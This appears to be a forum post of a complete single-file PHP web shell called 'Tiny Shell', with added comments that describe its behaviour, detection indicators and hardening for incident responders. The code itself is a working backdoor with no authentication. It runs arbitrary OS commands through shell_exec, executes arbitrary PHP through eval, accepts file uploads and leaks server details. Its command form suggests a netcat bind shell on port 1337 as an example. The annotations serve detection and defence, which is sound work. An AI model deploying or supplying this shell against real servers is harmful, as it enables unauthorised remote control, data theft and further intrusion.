escalation666

tiny shell


<?php
/*
 * Single-file PHP web shell ("Tiny Shell"), annotated for detection and
 * incident-response review. The code is unchanged; only comments were added.
 *
 * Access control: none is visible. No password, session, token or source
 * address check runs before the dispatch on $_GET['mode'], so every mode is
 * available to any client that can request this file.
 *
 * Modes (query parameter "mode"; the @ only suppresses the notice when the
 * parameter is absent):
 *   phpinfo - calls phpinfo() and exits (full configuration disclosure).
 *   command - passes $_POST['tcommand'] unmodified to shell_exec() and echoes
 *             the result inside <pre> without HTML escaping.
 *   upload  - moves $_FILES['uploadedfile'] to './' plus basename() of the
 *             client-supplied name. No extension, content-type or size check
 *             is applied in this script. './' is presumably the script's own
 *             directory under a web SAPI; confirm for the server in question.
 *   eval    - passes stripslashes($_POST['code']) to eval().
 *
 * After the dispatch the page always prints php_uname(), a script URL built
 * from the client-controlled Host header, SERVER_SOFTWARE and the safe_mode
 * status, followed by the upload, command and eval forms.
 *
 * What a defender can look for:
 *   - Access logs: requests to one script with mode=phpinfo, mode=command,
 *     mode=upload or mode=eval in the query string; POST bodies carrying the
 *     fields tcommand, code or a multipart part named uploadedfile.
 *   - File content: shell_exec() and eval() called directly on $_POST values,
 *     and the page title "Tiny Shell".
 *   - File system: new files appearing beside the script, written by the web
 *     server account.
 *
 * Hardening that limits a script like this:
 *   - disable_functions can block shell_exec(); it does not cover eval(),
 *     which is a language construct rather than a function.
 *   - Deny PHP execution in any directory the web server account can write
 *     to, and run file-integrity monitoring on the web root.
 *
 * Notes on the listing itself:
 *   - The [b], [i] and [url=...] markers and the "?" before each heading look
 *     like artifacts of the forum rendering, not part of the original markup
 *     (not confirmable from this page).
 *   - safe_mode was removed in PHP 5.4; on later versions ini_get() returns
 *     false for it and the page reports "OFF (unsecure)".
 *   - $win and $disablefunc are assigned but never read in the visible code.
 */
if (@$_GET['mode'] == 'phpinfo') { phpinfo(); exit; } echo '<html> <head><title>Tiny Shell</title> <style> div.display { border: 2px solid #003B62; font-family: verdana; font-size: 80%; background-color: #B5CFE0; padding: 7px; margin: 5px; } h2.info{ font-size: 150%; margin: 2 0 15 20 color: black; font-family: Arial; } </style> </head> <body> <center>[b]<h1><font face="arial">? Tiny Shell ?</font></h1>[/b]</center>
'; $fullpath = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']; $maxsize = ini_get('upload_max_filesize'); $win = strtolower(substr(PHP_OS,0,3)) == "win"; $safemode = (@ini_get("safe_mode") || strtolower(@ini_get("safe_mode"))) == "on" ? "<font color=red>ON (secure)</font>" : "<font color=red>OFF (unsecure)</font>"; $disablefunc = @ini_get("disable_functions"); switch (@$_GET['mode']) { case 'command': /* unauthenticated OS command execution: raw POST field goes to shell_exec() */ if (!empty($_POST['tcommand'])) { echo '<div class=\'display\'> <h2 class=\'info\'>? Output</h2> <pre>'.shell_exec($_POST['tcommand']).'</pre></div>'; } unset($_POST); break; case 'upload': /* unauthenticated file write: client-chosen name, only basename() applied */ $target_path = './' . basename($_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { echo '<div class=\'display\'> <h2 class=\'info\'>? Output</h2> The file [b]'.basename($_FILES['uploadedfile']['name']).'[/b] has been uploaded.</div>'; } else{ echo '<div class=\'display\'> <h2 class=\'info\'>? Output</h2> An error occurred while uploading the file, please try again.</div>'; } break; case 'eval': /* unauthenticated PHP code execution: raw POST field goes to eval() */ if (isset($_POST['code'])) { echo '<div class=\'display\'> <h2 class=\'info\'>? Output</h2>'; eval(stripslashes($_POST['code'])); echo '</div>'; } break; } /* host and PHP environment details are printed on every request, whatever the mode */ echo '<div class=\'display\'> <h2 class=\'info\'>? General Info</h2> [b]'.wordwrap(php_uname(),90,"
",1).'[/b]
Full Script Path: [b]'.$fullpath.'[/b]
Server Software: [b][url='.$fullpath.']'.$_SERVER['SERVER_SOFTWARE'].'[/url][/b]
Safe Mode: [b]'.$safemode.'[/b]
</div>'; echo '<div class=\'display\'> <h2 class=\'info\'>? File Uploads</h2> WARNING MAX FILESIZE: '.$maxsize.'
<form enctype="multipart/form-data" action="?mode=upload" method="POST"> File to upload: <input type="file" name="uploadedfile" size=50 />
<input type="submit" value="Upload File" /> </form> </div>'; echo '<div class=\'display\'> <h2 class=\'info\'>? Run a Command</h2> <form action="?mode=command" method="POST"> Command: <input type="text" name="tcommand" size=50 /> <input type="submit" value="Send Command" />
[i]Example: nc -L -p 1337 -d -e cmd.exe[/i] </form> </div>'; echo '<div class=\'display\'> <h2 class=\'info\'>? Evaluate PHP</h2> <form action="?mode=eval" method="POST"> PHP code:
<textarea name="code" rows="10" cols="90"></textarea>
<input type="submit" value="Run Code" /> </form> </div> </body> </html>'; ?>
